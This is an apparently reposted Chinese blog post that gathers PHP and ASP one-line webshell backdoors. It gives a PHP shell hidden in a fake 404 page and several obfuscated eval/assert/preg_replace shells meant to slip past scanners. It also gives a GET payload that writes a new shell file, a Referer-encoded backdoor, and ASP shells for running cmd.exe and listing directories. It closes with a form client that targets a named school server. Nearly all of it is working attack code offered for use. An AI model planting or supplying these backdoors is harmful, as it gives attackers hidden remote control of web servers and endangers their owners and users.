1. 程式人生 > >表弟讓整理的各種一句話後門= =

表弟讓整理的各種一句話後門= =

信息安全 php asp

php

利用404頁面隱藏PHP小馬

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html><[email protected]
*/_replace("/[pageerror]/e",$_POST[‘error‘],"saft");header(‘HTTP/1.1 404 Not Found‘);?>

404頁面是網站常用的文件一般建議好後很少有人會去對它進行檢查修改這時我們可以利用這一點進行隱藏後門。

無特征隱藏PHP一句話

<?php
session_start();$_POST[‘code‘] && $_SESSION[‘theCode‘] = trim($_POST[‘code‘]);$_SESSION[‘theCode‘]&&preg_replace(‘\‘a\‘eis‘,‘e‘.‘v‘.‘a‘.‘l‘.‘(base64_decode($_SESSION[\‘theCode\‘]))‘,‘a‘);

將$_POST[‘code‘]的內容賦值給$_SESSION[‘theCode‘]然後執行$_SESSION[‘theCode‘]亮點是沒有特征碼。用掃描工具來檢查代碼的話是不會報警的達到目的了。

超級隱蔽的PHP後門

<?php $_GET[a]($_GET[b]);?>

僅用GET函數就構成了木馬

利用方法

?a=assert&b=${fputs%28fopen%28base64_decode%28Yy5waHA%29,w%29,base64_decode%28PD9waHAgQGV2YWwoJF9QT1NUW2NdKTsgPz4x%29%29};

執行後當前目錄生成c.php一句話木馬當傳參a為eval時會報錯木馬生成失敗為assert時同樣報錯但會生成木馬真可謂不可小視簡簡單單的一句話被延伸到這般應用。

層級請求編碼運行PHP後門
此方法用兩個文件實現文件1

<?php//1.phpheader(‘Content-type:text/html;charset=utf-8‘);parse_str($_SERVER[‘HTTP_REFERER‘], $a);if(reset($a) == ‘10‘ && count($a) == 9) {   eval(base64_decode(str_replace(" ", "+", implode(array_slice($a, 6)))));}

文件2

<?php//2.phpheader(‘Content-type:text/html;charset=utf-8‘);//要執行的代碼$code = <<<CODE
phpinfo();CODE;//進行base64編碼$code = base64_encode($code);//構造referer字符串$referer = "a=10&b=ab&c=34&d=re&e=32&f=km&g={$code}&h=&i=";//後門url$url = ‘http://localhost/test1/1.php‘;$ch = curl_init();$options = array(    CURLOPT_URL => $url,    CURLOPT_HEADER => FALSE,    CURLOPT_RETURNTRANSFER => TRUE,    CURLOPT_REFERER => $referer);curl_setopt_array($ch, $options);echo curl_exec($ch);

三個變形的一句話PHP木馬
第一個

<?php ($_=@$_GET[2]).@$_($_POST[1])?>

在菜刀裏寫http://site/1.php?2=assert密碼是1

第二個

<?php
$_="";$_[+""]=‘‘;$_="$_"."";$_=($_[+""]|"").($_[+""]|"").($_[+""]^"");?><?php ${‘_‘.$_}[‘_‘](${‘_‘.$_}[‘__‘]);?>

在菜刀裏寫http://site/2.php?_=assert&__=eval($_POST[‘pass‘]) 密碼是pass。如果你用菜刀的附加數據的話更隱蔽或者用其它註射工具也可以因為是post提交的。

第三個

($b4dboy = $_POST[‘b4dboy‘]) && @preg_replace(‘/ad/e‘,[email protected]_rot13(‘riny‘).‘($b4dboy)‘, ‘add‘);

str_rot13(‘riny’)即編碼後的eval完全避開了關鍵字又不失效果讓人吐血

最後列幾個高級的PHP一句話木馬後門

1、$hh = "p"."r"."e"."g"."_"."r"."e"."p"."l"."a"."c"."e";$hh("/[discuz]/e",$_POST[‘h‘],"Access");//菜刀一句話2、$filename=$_GET[‘xbid‘];include ($filename);//危險的include函數直接編譯任何文件為php格式運行3、$reg="c"."o"."p"."y";$reg($_FILES[MyFile][tmp_name],$_FILES[MyFile][name]);//重命名任何文件4、$gzid = "p"."r"."e"."g"."_"."r"."e"."p"."l"."a"."c"."e";$gzid("/[discuz]/e",$_POST[‘h‘],"Access");//菜刀一句話5、include ($uid);//危險的include函數直接編譯任何文件為php格式運行POST www.xxx.com/index.php?uid=/home/www/bbs/image.gif//gif插一句話6、典型一句話程序後門代碼<?php eval_r($_POST[sb])?>程序代碼<?php @eval_r($_POST[sb])?>//容錯代碼程序代碼<?php assert($_POST[sb]);?>//使用lanker一句話客戶端的專家模式執行相關的php語句程序代碼<?$_POST[‘sa‘]($_POST[‘sb‘]);?>程序代碼<?$_POST[‘sa‘]($_POST[‘sb‘],$_POST[‘sc‘])?>程序代碼<[email protected]_replace("/[email]/e",$_POST[‘h‘],"error");?>//使用這個後,使用菜刀一句話客戶端在配置連接的時候在"配置"一欄輸入程序代碼<O>[email protected]_r($_POST1);</O>程序代碼<script language="php">@eval_r($_POST[sb])</script>//繞過<?限制的一句話

綜上

asp

ASP一句話木馬大全

<%eval request("MH")%>

<%execute request("MH")%>

<%execute(request("MH"))%>

<%If Request("MH")<>""Then Execute(Request("MH"))%>

<%if request("MH")<>""thensession("MH")=request("MH"):end if:ifsession("MH")<>"" then executesession("MH")%>

<SCRIPT language=VBScriptrunat="server">executerequest("MH")</SCRIPT>

<%@ Page Language="Jscript"%>

<%eval_r(Request.Item["MH"],"unsafe");%>


1asp一句話木馬
一句話木馬 服務器端
帶驗證:
——————————————cmd.asp————————————————
<%
if request("authkey")="pic16f873a" then
%>
<textarea readonly cols=80rows=25>
<%response.writeserver.createobject("wscript.shell").exec("cmd.exe /c"&request("cmd")).stdout.readall%>
</textarea>
<%
end if
%>

帶驗證 客戶端
——————————————cmd.html————————————————
<HTML>
<HEAD>
<meta http-equiv="Content-Type" content="text/html;charset=gbk">
</HEAD>
<div align=center>
<FORM method=post name=frmtarget=_blank>
Host:<input type=text name=act size=65value="
http://">
<br>
<br>
Cmd :<input type=text name=cmd size=65value="cmd">
<br>
<br>
<input type=hidden name=authkeyvalue="pic16f873a">
<Input name=Send
onclick="Javascipt:frm.action=document.frm.act.value;
frm.submit();"
type=button value="Send Command">
</FORM>
</div>



目錄瀏覽

服務器端
_________________________________________
<%
if request("authkey")="pic16f873a" then
szPara = Request.Form("path")
set shell=server.createobject("shell.application")
set dir1=shell.namespace(szPara)
set diritems=dir1.items

for each iii in diritems
response.write iii.path & "<fontcolor=blue>[" & iii.size&"]</font><br>"
next
end if
%>
_________________________________________
客戶端
__________________________________________
<HTML>
<HEAD>
<meta http-equiv="Content-Type" content="text/html;charset=gbk">
</HEAD>
<div align=center>
<FORM method=post name=frmtarget=_blank>
Host:<input type=text name=act size=65value="
http://">
<br>
<br>
Path:<input type=text name=path size=65value="C:\">
<br>
<br>
<input type=hidden name=authkeyvalue="pic16f873a">
<Input name=Sendonclick="Javascipt:frm.action=document.frm.act.value;frm.submit();"
type=button value="Send Command">

</FORM>
</div>


一句話木馬客戶端源文件

裏面涉及到一些腳本知識我就只講解一下功能和簡單註釋不詳細講了大家只要註意幾個註意點就行了
***********************************************************

<form action=
http://cjy.xjife.edu.cn/news/ebook/db/ebook.aspmethod=post>
//"action="後面是需要修改的以asp命名的數據庫的提交地址
//這個標簽的意思是建立一個表單 以post方式提交給連接
http://cjy.xjife.edu.cn/news/ebook/db/ebook.asp處理

<textarea name=value cols=120 rows=10width=45>
//這裏的value值根據服務端<%executerequest("value")%>中value而設定
//可以自行修改成<%executerequest("p")%>相應這裏的value值也必須改為p

setlP=server.createObject("Adodb.Stream")//建立流對象有了對象才可以使用它固有的屬性和方法
lP.Open //打開
lP.Type=2 //以文本方式
lP.CharSet="gb2312" //字體標準
lP.writetext request("joeving") //取得木馬內容 參數joeving可以自己定義但必須和下面的name=joeving相對應
lP.SaveToFile server.mappath("wei.asp"),2
//將木馬內容以覆蓋文件的方式寫入wei.asp
//2就是已覆蓋的方式這裏的wei.asp也是可以自己定義的如定義成1.asp
//但和下面的response.redirect"wei.asp"中wei.asp的保持一致
lP.Close //關閉對象
set lP=nothing //釋放對象
response.redirect "wei.asp"//轉向生成的wei.asp和上面的wei.asp相對應也就是你熟悉的asp木馬登陸界面
</textarea>
//這段程序的功能利用插入到數據庫文件的<%executerequest("value")%>這段代碼執行第一個textarea中的內容並將添加的木馬內容寫入和指向wei.asp這樣就相當於在服務器上建立了個asp木馬文件這樣就可以取得webshell了

<textarea name=joeving cols=120 rows=10width=45>添入生成木馬的內容/textarea><BR><center><br>
//這段標簽是你用來添加木馬內容用的

<input type=submit value=提交>
</form>

***********************************************************

//程序的主要框架是
<form>
<textarea></textarea>//取得木馬內容並用無組件上傳技術在服務器端創建asp木馬文件並顯示
<textarea></textarea>//添加木馬內容用的
</form>
其實都是些很簡單的一些html和asp

本文出自 “安陌離” 博客,謝絕轉載!

表弟讓整理的各種一句話後門= =